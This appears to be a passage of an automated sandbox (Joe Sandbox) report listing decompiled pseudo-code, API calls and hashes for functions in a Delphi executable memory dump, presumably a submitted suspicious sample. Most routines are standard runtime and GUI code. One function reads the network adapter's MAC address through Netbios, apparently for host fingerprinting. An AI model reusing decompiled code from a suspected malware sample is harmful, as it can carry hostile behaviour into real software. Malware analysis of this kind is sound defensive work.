                                                    0x00406c5d
                                                    0x00406c62

                                                    APIs
                                                      • Part of subcall function 00403A2C: GetKeyboardType.USER32 ref: 00403A31
                                                      • Part of subcall function 00403A2C: GetKeyboardType.USER32 ref: 00403A3D
                                                    • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                    • GetVersion.KERNEL32 ref: 00406C0B
                                                    • GetVersion.KERNEL32 ref: 00406C1C
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                      • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                      • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                      • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                    • GetThreadLocale.KERNEL32 ref: 00406C38
                                                      • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                    • String ID:
                                                    • API String ID: 3734044017-0
                                                    • Opcode ID: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                    • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                    • Opcode Fuzzy Hash: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                    • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 60%
                                                    			E00475658(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				signed char* _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				char _v40;
                                                    				char _v44;
                                                    				char _t79;
                                                    				char* _t115;
                                                    				void* _t116;
                                                    				intOrPtr _t145;
                                                    				void* _t152;
                                                    				intOrPtr _t155;
                                                    				intOrPtr _t156;
                                                    				void* _t162;
                                                    
                                                    				_t155 = _t156;
                                                    				_t116 = 5;
                                                    				do {
                                                    					_push(0);
                                                    					_push(0);
                                                    					_t116 = _t116 - 1;
                                                    				} while (_t116 != 0);
                                                    				_v8 = __eax;
                                                    				_push(_t155);
                                                    				_push(0x475868);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t156;
                                                    				E004049C0(_v8);
                                                    				E004049C0( &_v20);
                                                    				_t115 = E0040275C(0x40);
                                                    				E004032B4(_t115, 0x40);
                                                    				_v16 = E0040275C(0x100);
                                                    				E004032B4(_v16, 0x100);
                                                    				_t152 = E0040275C(0x3c);
                                                    				E004032B4(_t152, 0x3c);
                                                    				 *_v16 = 0;
                                                    				 *_t115 = 0x37;
                                                    				 *((intOrPtr*)(_t115 + 4)) = _v16;
                                                    				 *((short*)(_t115 + 8)) = 4;
                                                    				_push(_t115);
                                                    				L00472C18();
                                                    				_v12 = 0;
                                                    				while(1) {
                                                    					E004032B4(_t115, 0x40);
                                                    					 *_t115 = 0x32;
                                                    					 *((char*)(_t115 + 0x30)) = _v16[_v12 + 1];
                                                    					_push(_t115);
                                                    					L00472C18();
                                                    					E004032B4(_t115, 0x40);
                                                    					 *_t115 = 0x33;
                                                    					_t79 = _v16[_v12 + 1];
                                                    					 *((char*)(_t115 + 0x30)) = _t79;
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					_t152 = _t152;
                                                    					 *((intOrPtr*)(_t115 + 4)) = 0x475878;
                                                    					 *((short*)(_t115 + 8)) = 0x3c;
                                                    					_push(_t115);
                                                    					L00472C18();
                                                    					if(_t79 == 0 || _t79 == 6) {
                                                    						E00409600( &_v24, 2);
                                                    						_push(_v24);
                                                    						_push(0x475890);
                                                    						E00409600( &_v28, 2);
                                                    						_push(_v28);
                                                    						_push(0x475890);
                                                    						E00409600( &_v32, 2);
                                                    						_push(_v32);
                                                    						_push(0x475890);
                                                    						E00409600( &_v36, 2);
                                                    						_push(_v36);
                                                    						_push(0x475890);
                                                    						E00409600( &_v40, 2);
                                                    						_push(_v40);
                                                    						_push(0x475890);
                                                    						E00409600( &_v44, 2);
                                                    						_push(_v44);
                                                    						E00404D40();
                                                    					}
                                                    					_v12 = _v12 + 1;
                                                    					_t162 = ( *_v16 & 0x000000ff) - _v12;
                                                    					if(_t162 <= 0) {
                                                    						break;
                                                    					}
                                                    					E00404DCC(_v20, "00-00-00-00-00-00");
                                                    					if(_t162 == 0) {
                                                    						continue;
                                                    					}
                                                    					break;
                                                    				}
                                                    				E0040277C(_t115);
                                                    				E0040277C(_t152);
                                                    				E0040277C(_v16);
                                                    				E00404A14(_v8, _v20);
                                                    				_pop(_t145);
                                                    				 *[fs:eax] = _t145;
                                                    				_push(0x47586f);
                                                    				return E004049E4( &_v44, 7);
                                                    			}

                                                    0x00475659
                                                    0x0047565b
                                                    0x00475660
                                                    0x00475660
                                                    0x00475662
                                                    0x00475664
                                                    0x00475664
                                                    0x0047566a
                                                    0x0047566f
                                                    0x00475670
                                                    0x00475675
                                                    0x00475678
                                                    0x0047567e
                                                    0x00475686
                                                    0x00475695
                                                    0x004756a0
                                                    0x004756af
                                                    0x004756bc
                                                    0x004756cb
                                                    0x004756d6
                                                    0x004756de
                                                    0x004756e1

                                                    APIs
                                                    • Netbios.NETAPI32(00000000), ref: 004756F1
                                                    • Netbios.NETAPI32(00000000), ref: 0047571C
                                                    • Netbios.NETAPI32(00000000), ref: 00475757
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Netbios
                                                    • String ID: 00-00-00-00-00-00$<
                                                    • API String ID: 544444789-41023692
                                                    • Opcode ID: 1b3c46c424ce61c2de374a88a3e63ba3c340aecb30e3da8f6094dd15b6fa7177
                                                    • Instruction ID: dc29ca18e00d15a9725c9b3c649b13ae9c6c43c4cf661d243729a07c7496b8e6
                                                    • Opcode Fuzzy Hash: 1b3c46c424ce61c2de374a88a3e63ba3c340aecb30e3da8f6094dd15b6fa7177
                                                    • Instruction Fuzzy Hash: 0A5183346045449BDB01EFA9C882BDEBBF5AF4C304F5584BEE458BB383C6789901CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 95%
                                                    			E0042AE8C(intOrPtr* __eax, void* __edx) {
                                                    				intOrPtr* _v8;
                                                    				struct HPALETTE__* _v12;
                                                    				char _v13;
                                                    				intOrPtr _v25;
                                                    				intOrPtr _v29;
                                                    				intOrPtr _v33;
                                                    				intOrPtr _v57;
                                                    				short _v59;
                                                    				short _v61;
                                                    				intOrPtr _v65;
                                                    				intOrPtr _v69;
                                                    				intOrPtr _v73;
                                                    				intOrPtr _v77;
                                                    				intOrPtr _v89;
                                                    				intOrPtr _v93;
                                                    				void _v97;
                                                    				void* _t44;
                                                    				void* _t46;
                                                    				intOrPtr _t49;
                                                    				void* _t54;
                                                    				struct HPALETTE__* _t56;
                                                    				void* _t72;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				struct HDC__* _t76;
                                                    				intOrPtr _t97;
                                                    				void* _t107;
                                                    				void* _t109;
                                                    				void* _t110;
                                                    				intOrPtr _t112;
                                                    
                                                    				_t107 = _t109;
                                                    				_t110 = _t109 + 0xffffffa0;
                                                    				_t72 = __edx;
                                                    				_v8 = __eax;
                                                    				_t44 = L00429FC8(_v8);
                                                    				if(_t72 == _t44) {
                                                    					L16:
                                                    					return _t44;
                                                    				} else {
                                                    					_t46 = _t72 - 1;
                                                    					if(_t46 < 0) {
                                                    						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
                                                    						goto L16;
                                                    					} else {
                                                    						if(_t46 == 7) {
                                                    							_t49 =  *0x49d90c; // 0x422ec0
                                                    							_t44 = L00425F28(_t49);
                                                    							goto L16;
                                                    						} else {
                                                    							E004032B4( &_v97, 0x54);
                                                    							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
                                                    							_t112 = _t110 + 0xc;
                                                    							_v13 = 0;
                                                    							_v77 = 0;
                                                    							_v73 = 0x28;
                                                    							_v69 = _v93;
                                                    							_v65 = _v89;
                                                    							_v61 = 1;
                                                    							_v59 =  *0x0049B8B3 & 0x000000ff;
                                                    							_v12 =  *((intOrPtr*)(_t54 + 0x10));
                                                    							_t74 = _t72 - 2;
                                                    							if(_t74 == 0) {
                                                    								_t56 =  *0x49e894; // 0x5e0807a3
                                                    								_v12 = _t56;
                                                    							} else {
                                                    								_t75 = _t74 - 1;
                                                    								if(_t75 == 0) {
                                                    									_t76 = E00426060(GetDC(0));
                                                    									_v12 = CreateHalftonePalette(_t76);
                                                    									_v13 = 1;
                                                    									ReleaseDC(0, _t76);
                                                    								} else {
                                                    									if(_t75 == 2) {
                                                    										_v57 = 3;
                                                    										_v33 = 0xf800;
                                                    										_v29 = 0x7e0;
                                                    										_v25 = 0x1f;
                                                    									}
                                                    								}
                                                    							}
                                                    							 *[fs:eax] = _t112;
                                                    							 *((char*)(_v8 + 0x22)) = L00429AA8( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42afd9, _t107),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
                                                    							_pop(_t97);
                                                    							 *[fs:eax] = _t97;
                                                    							_push(0x42afe0);
                                                    							if(_v13 != 0) {
                                                    								return DeleteObject(_v12);
                                                    							}
                                                    							return 0;
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0042AF49
                                                    • CreateHalftonePalette.GDI32(00000000,00000000), ref: 0042AF56
                                                    • ReleaseDC.USER32 ref: 0042AF65
                                                    • DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateDeleteHalftoneObjectPaletteRelease
                                                    • String ID: (
                                                    • API String ID: 577518360-3887548279
                                                    • Opcode ID: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                    • Instruction ID: 2a0d3ada1f03d7f2548bc3f3360be5a611323719477d61fc332258d066da6c8f
                                                    • Opcode Fuzzy Hash: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                    • Instruction Fuzzy Hash: AE41F470B04208DFDB00DFA8D585B9EB7F6EF49304F9140AAE804A7391C67C5E15DB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E00422C88(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                    				struct _WNDCLASSA _v44;
                                                    				struct HINSTANCE__* _t6;
                                                    				CHAR* _t8;
                                                    				struct HINSTANCE__* _t9;
                                                    				int _t10;
                                                    				void* _t11;
                                                    				struct HINSTANCE__* _t13;
                                                    				struct HINSTANCE__* _t19;
                                                    				CHAR* _t20;
                                                    				struct HWND__* _t22;
                                                    				CHAR* _t24;
                                                    
                                                    				_t6 =  *0x49e668; // 0x400000
                                                    				 *0x49b5dc = _t6;
                                                    				_t8 =  *0x49b5f0; // 0x422c78
                                                    				_t9 =  *0x49e668; // 0x400000
                                                    				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                                    				asm("sbb eax, eax");
                                                    				_t11 = _t10 + 1;
                                                    				if(_t11 == 0 || L00407540 != _v44.lpfnWndProc) {
                                                    					if(_t11 != 0) {
                                                    						_t19 =  *0x49e668; // 0x400000
                                                    						_t20 =  *0x49b5f0; // 0x422c78
                                                    						UnregisterClassA(_t20, _t19);
                                                    					}
                                                    					RegisterClassA(0x49b5cc);
                                                    				}
                                                    				_t13 =  *0x49e668; // 0x400000
                                                    				_t24 =  *0x49b5f0; // 0x422c78
                                                    				_t22 = E00407A8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                                                    				if(_a6 != 0) {
                                                    					SetWindowLongA(_t22, 0xfffffffc, E00422BCC(_a4, _a8));
                                                    				}
                                                    				return _t22;
                                                    			}

                                                    APIs
                                                    • GetClassInfoA.USER32 ref: 00422CA9
                                                    • UnregisterClassA.USER32 ref: 00422CD2
                                                    • RegisterClassA.USER32 ref: 00422CDC
                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 00422D27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                    • String ID: x,B
                                                    • API String ID: 4025006896-71347176
                                                    • Opcode ID: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                    • Instruction ID: 5edbcaf682720338496e3359f8b598ec737c219f81609156ea6670bddb9c1a51
                                                    • Opcode Fuzzy Hash: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                    • Instruction Fuzzy Hash: E0018E71744204BBDB00EB6AED81F9A7399EB28718F544137F904E73A1D679AC40CBAD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E0042572C(void* __ecx, void* __edx) {
                                                    				void* __ebx;
                                                    				void* __esi;
                                                    				intOrPtr _t19;
                                                    				char _t32;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t35;
                                                    				void* _t38;
                                                    				void* _t39;
                                                    				void* _t40;
                                                    				intOrPtr _t46;
                                                    				intOrPtr _t47;
                                                    				intOrPtr _t48;
                                                    				intOrPtr _t49;
                                                    				void* _t50;
                                                    				void* _t51;
                                                    
                                                    				_t40 = __edx;
                                                    				_t39 = __ecx;
                                                    				if(__edx != 0) {
                                                    					_t51 = _t51 + 0xfffffff0;
                                                    					_t19 = L00403F10(_t19, _t50);
                                                    				}
                                                    				_t38 = _t40;
                                                    				_t46 = _t19;
                                                    				L00403BBC(0);
                                                    				_t1 = _t46 + 0x38; // 0x38
                                                    				L00407198();
                                                    				_t47 = E00424C3C(1);
                                                    				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
                                                    				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
                                                    				 *((intOrPtr*)(_t47 + 8)) = 0x425eb0;
                                                    				_t5 = _t46 + 0x38; // 0x38
                                                    				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
                                                    				_t48 = E00425168(1);
                                                    				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
                                                    				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
                                                    				 *((intOrPtr*)(_t48 + 8)) = 0x425ed0;
                                                    				_t10 = _t46 + 0x38; // 0x38
                                                    				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
                                                    				_t49 = E00425434(1);
                                                    				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
                                                    				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
                                                    				 *((intOrPtr*)(_t49 + 8)) = 0x425ef0;
                                                    				_t15 = _t46 + 0x38; // 0x38
                                                    				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
                                                    				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
                                                    				_t32 =  *0x4257ec; // 0x0
                                                    				 *((char*)(_t46 + 8)) = _t32;
                                                    				_t33 =  *0x49e8ec; // 0x3030b08
                                                    				E0041AFE4(_t33, _t38, _t39, _t46, _t49);
                                                    				_t35 = _t46;
                                                    				if(_t38 != 0) {
                                                    					L00403F68(_t35);
                                                    					_pop( *[fs:0x0]);
                                                    				}
                                                    				return _t46;
                                                    			}

                                                    APIs
                                                    • RtlInitializeCriticalSection.KERNEL32(vas,00428B00,?,00000001,00428C96,?,?,?,00429F01,?,?,00429D20,?,0000000E,00000000,?), ref: 0042574C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalInitializeSection
                                                    • String ID: h7B$h8B$vas$5B
                                                    • API String ID: 32694325-2931570110
                                                    • Opcode ID: bd3b095f9042d2604a0f53fc41302a85decb916e5816816f9a96bdd2596773ca
                                                    • Instruction ID: 3f3694d375962d4255fc29ac861639cc4656e31162b1a28f9c4b0cd7577d53a2
                                                    • Opcode Fuzzy Hash: bd3b095f9042d2604a0f53fc41302a85decb916e5816816f9a96bdd2596773ca
                                                    • Instruction Fuzzy Hash: E9118EB1A01B129FC320EF2AE840985FBF9BF84314384853FE449C7B11D779A9558B94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E0044E150(intOrPtr* __eax) {
                                                    				struct tagMENUITEMINFOA _v128;
                                                    				intOrPtr _v132;
                                                    				int _t16;
                                                    				intOrPtr* _t29;
                                                    				struct HMENU__* _t36;
                                                    				MENUITEMINFOA* _t37;
                                                    
                                                    				_t37 =  &_v128;
                                                    				_t29 = __eax;
                                                    				_t16 =  *0x49de44; // 0x49e744
                                                    				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                                    					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                                    					_t37->cbSize = 0x2c;
                                                    					_v132 = 0x10;
                                                    					_v128.hbmpUnchecked =  &(_v128.cch);
                                                    					_v128.dwItemData = 0x50;
                                                    					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                    					if(_t16 != 0) {
                                                    						_t16 = E0044E4D4(_t29);
                                                    						asm("sbb edx, edx");
                                                    						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                                    							_v128.cbSize = ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) + ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                                    							_v132 = 0x10;
                                                    							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                    							if(_t16 != 0) {
                                                    								return DrawMenuBar( *(_t29 + 0x38));
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t16;
                                                    			}

                                                    APIs
                                                    • GetMenuItemInfoA.USER32 ref: 0044E19E
                                                    • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044E1F0
                                                    • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044E1FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw
                                                    • String ID: DI$P
                                                    • API String ID: 3227129158-1383934172
                                                    • Opcode ID: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                    • Instruction ID: 3c7080e089ef200bda1d0293621365d90923fd6ea2d15a2cda29d63b16e16469
                                                    • Opcode Fuzzy Hash: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                    • Instruction Fuzzy Hash: 2B1190716052006BE3109B29CC85B4A76D8BB85324F14866AF5A4CB3DAD679D844C74A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00402944(void* __eax, void* __edx) {
                                                    				char _v271;
                                                    				char _v532;
                                                    				char _v534;
                                                    				char _v535;
                                                    				void* _t21;
                                                    				void* _t25;
                                                    				CHAR* _t26;
                                                    
                                                    				_t25 = __edx;
                                                    				_t21 = __eax;
                                                    				if(__eax != 0) {
                                                    					 *_t26 = 0x40;
                                                    					_v535 = 0x3a;
                                                    					_v534 = 0;
                                                    					GetCurrentDirectoryA(0x105,  &_v271);
                                                    					SetCurrentDirectoryA(_t26);
                                                    				}
                                                    				GetCurrentDirectoryA(0x105,  &_v532);
                                                    				if(_t21 != 0) {
                                                    					SetCurrentDirectoryA( &_v271);
                                                    				}
                                                    				return E00404C30(_t25, 0x105,  &_v532);
                                                    			}

                                                    APIs
                                                    • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 00402976
                                                    • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040297C
                                                    • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 0040298B
                                                    • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040299C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    • Opcode ID: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                    • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                    • Opcode Fuzzy Hash: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                    • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                    				signed short* _v8;
                                                    				signed int _v12;
                                                    				char _v13;
                                                    				signed int _v16;
                                                    				signed int _v18;
                                                    				void* _v24;
                                                    				void* _v28;
                                                    				signed int _v44;
                                                    				void* __ebp;
                                                    				signed short _t136;
                                                    				signed short* _t256;
                                                    				intOrPtr _t307;
                                                    				intOrPtr _t310;
                                                    				intOrPtr _t318;
                                                    				intOrPtr _t325;
                                                    				intOrPtr _t333;
                                                    				signed int _t338;
                                                    				void* _t346;
                                                    				void* _t348;
                                                    				intOrPtr _t349;
                                                    
                                                    				_t353 = __fp0;
                                                    				_t346 = _t348;
                                                    				_t349 = _t348 + 0xffffffd8;
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t256 = __eax;
                                                    				_v13 = 1;
                                                    				_t338 =  *((intOrPtr*)(__eax));
                                                    				if((_t338 & 0x00000fff) >= 0x10f) {
                                                    					_t136 =  *_v8;
                                                    					if(_t136 != 0) {
                                                    						if(_t136 != 1) {
                                                    							if(E0041713C(_t338,  &_v24) != 0) {
                                                    								_push( &_v18);
                                                    								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
                                                    									_t341 =  *_v8;
                                                    									if(( *_v8 & 0x00000fff) >= 0x10f) {
                                                    										if(E0041713C(_t341,  &_v28) != 0) {
                                                    											_push( &_v16);
                                                    											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                    												E0041024C(0xb);
                                                    												goto L46;
                                                    											} else {
                                                    												if( *_t256 == _v16) {
                                                    													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    													goto L46;
                                                    												} else {
                                                    													_push( &_v44);
                                                    													L0040F318();
                                                    													_push(_t346);
                                                    													_push(0x416ab5);
                                                    													_push( *[fs:eax]);
                                                    													 *[fs:eax] = _t349;
                                                    													_t268 = _v16 & 0x0000ffff;
                                                    													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                                    													if(_v44 != _v16) {
                                                    														E0041015C(_t268);
                                                    													}
                                                    													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    													_pop(_t307);
                                                    													 *[fs:eax] = _t307;
                                                    													_push(0x416ae8);
                                                    													return E004109E8( &_v44);
                                                    												}
                                                    											}
                                                    										} else {
                                                    											E0041024C(0xb);
                                                    											goto L46;
                                                    										}
                                                    									} else {
                                                    										_push( &_v44);
                                                    										L0040F318();
                                                    										_push(_t346);
                                                    										_push(0x4169ff);
                                                    										_push( *[fs:eax]);
                                                    										 *[fs:eax] = _t349;
                                                    										_t273 =  *_v8 & 0x0000ffff;
                                                    										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
                                                    										if( *_v8 != _v44) {
                                                    											E0041015C(_t273);
                                                    										}
                                                    										_v13 = E00416548( &_v44, _v12, _v8, _t353);
                                                    										_pop(_t310);
                                                    										 *[fs:eax] = _t310;
                                                    										_push(0x416ae8);
                                                    										return E004109E8( &_v44);
                                                    									}
                                                    								} else {
                                                    									if( *_v8 == _v18) {
                                                    										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    										goto L46;
                                                    									} else {
                                                    										_push( &_v44);
                                                    										L0040F318();
                                                    										_push(_t346);
                                                    										_push(0x41695d);
                                                    										_push( *[fs:eax]);
                                                    										 *[fs:eax] = _t349;
                                                    										_t278 = _v18 & 0x0000ffff;
                                                    										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
                                                    										if(_v44 != _v18) {
                                                    											E0041015C(_t278);
                                                    										}
                                                    										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    										_pop(_t318);
                                                    										 *[fs:eax] = _t318;
                                                    										_push(0x416ae8);
                                                    										return E004109E8( &_v44);
                                                    									}
                                                    								}
                                                    							} else {
                                                    								E0041024C(__ecx);
                                                    								goto L46;
                                                    							}
                                                    						} else {
                                                    							_v13 = E00416328(_v12, 2);
                                                    							goto L46;
                                                    						}
                                                    					} else {
                                                    						_v13 = E00416314(0, 1);
                                                    						goto L46;
                                                    					}
                                                    				} else {
                                                    					if(_t338 != 0) {
                                                    						if(_t338 != 1) {
                                                    							if(E0041713C( *_v8,  &_v28) != 0) {
                                                    								_push( &_v16);
                                                    								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                    									_push( &_v44);
                                                    									L0040F318();
                                                    									_push(_t346);
                                                    									_push(0x41686d);
                                                    									_push( *[fs:eax]);
                                                    									 *[fs:eax] = _t349;
                                                    									_t284 =  *_t256 & 0x0000ffff;
                                                    									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
                                                    									if((_v44 & 0x00000fff) !=  *_t256) {
                                                    										E0041015C(_t284);
                                                    									}
                                                    									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
                                                    									_pop(_t325);
                                                    									 *[fs:eax] = _t325;
                                                    									_push(0x416ae8);
                                                    									return E004109E8( &_v44);
                                                    								} else {
                                                    									if( *_t256 == _v16) {
                                                    										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                                    										goto L46;
                                                    									} else {
                                                    										_push( &_v44);
                                                    										L0040F318();
                                                    										_push(_t346);
                                                    										_push(0x4167df);
                                                    										_push( *[fs:eax]);
                                                    										 *[fs:eax] = _t349;
                                                    										_t289 = _v16 & 0x0000ffff;
                                                    										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                                    										if((_v44 & 0x00000fff) != _v16) {
                                                    											E0041015C(_t289);
                                                    										}
